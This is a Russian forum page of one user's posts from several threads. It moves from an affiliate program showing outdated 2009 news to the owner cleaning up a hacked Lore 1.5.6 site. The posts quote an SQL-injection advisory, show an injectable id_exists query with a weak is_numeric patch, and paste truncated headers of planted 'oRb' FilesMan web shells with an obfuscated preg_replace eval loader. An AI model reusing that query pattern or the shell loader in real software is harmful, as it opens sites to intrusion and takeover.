Thorin

Рейтинг
81
Регистрация
06.10.2007
siv1987:
Купить у автора де-зендовый вариант интеграции.

Он хочет 300$))

TF-Studio:
Заказать свою интеграцию- не вариант (даже получить больше, чем есть уже), с учетом особенностей системы и возможной нагрузки?
Не так уж и дорого это будет стоить.

Спасибо, это вариант, что то я и не подумал о этом)

Возможно еще будут варианты)

Я так понимаю что потихоньку выплачивают

так трудно отписать кому и сколько выплатили и когда следующая выплата?

hardsun:
Так и домен а ля 2009. На новый зайди..

ыы, спс, не понял где я лоханулся с доменами)

У всех плющит партнёрку или ток у меня?

Вчера целый день загрузить страницу партнерки не мог, соединение сброшено

Сегодня дизайн партнерки за 2009 год + стата криво пашет

новости тоже за 2009 год


Новости Еще
24/12/09
С радостью сообщаем о добавлении в партнерскую программу нового дизайна для "Знакомств с миллионерами"

21/12/09
К сожалению, мы вынуждены сообщить Вам о прекращении работы с GSM-сервисами. Просим Вас до 06.00 утра 22 декабря 2009 года снять трафик с gsm-пеленгаторов и смс-шпионов...

11/12/09
Рады сообщить о добавлении в партнерскую программу нового проекта "Знакомства с миллионерами".

Что происходит?

png moneysyst.png

Проверил файлы с оригиналами, код который дописали не обнаружил, нужно еще раз проверить.


Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует при обработке входных данных в параметре "id" сценария "article.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

function id_exists($id, $table)

{
return $this->query_one_result("SELECT COUNT(*) FROM $table WHERE id = '$id'");
}

для защиты достаточно добавить ????


function id_exists($id, $table)
{
if(!is_numeric($id))
die('wrong id');
return $this->query_one_result("SELECT COUNT(*) FROM $table WHERE id = '$id'");
}

после того как удалил 2 шела, обнаружил код, прятался он в

var/templates_c файле %%239^%%239105369^footer.tpl.php

Файлы все обязательно вечером перелопатю)

На хакер.ру

Уязвимости - Lore
SQL-инъекция в Lore
29.01.2009
Эксплоит: есть

Межсайтовый скриптинг в Lore
28.07.2008

SQL-инъекция в Lore
07.06.2006

SQL-инъекция в Lore
13.12.2005
Эксплоит: есть

Разве возможно через эти уязвимости загрузить шел?

(Там почти все в одном месте я думаю что сам подлатаю)

Раньше когда сохранял пароли в КутФТП, 1 или 2 раза прописывался ифрейм внизу во всех index main файлах, возможно тогда и залили шел?

старых бекапов нету...

в папке var есть файл, var.php

содержания типа

<?php #Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845"; #root
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C......................

дата модификации 2010 год, немного еще поискав

в папке cp\templates файл conf.php


<?php # Web Shell by oRb
$auth_pass = "85b76548c1b6f822366ed0821219b6f7";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\..................................

дата модификации 2007 год (время создания сайта и заливка остальных файлов)

выходит что я скрипт скачал изначально с шелом, а потом его просто обновили?

сайт я сам модифицировал, доступ к загрузке файлов имею только я. Возможно этот шел еще гдето следы оставляет?

LEOnidUKG:
Зависит.

1. Какой движок?
2. Проверьте, модуля никакие не подключались и не изменялись для веб-сервера.

сервер арендую у фрихост.ком.уа

1. Очень древний движок Lore 1.5.6

2. Вроде ничего не подключалось и не изменялось (судя по дате изменения файлов апача)

а у меня ФФ ругается

Имеется информация, что эта веб-страница является мошеннической!


Имеется информация о том, что веб-страница *** является мошеннической. В соответствии с вашими настройками безопасности она была заблокирована.
Всего: 173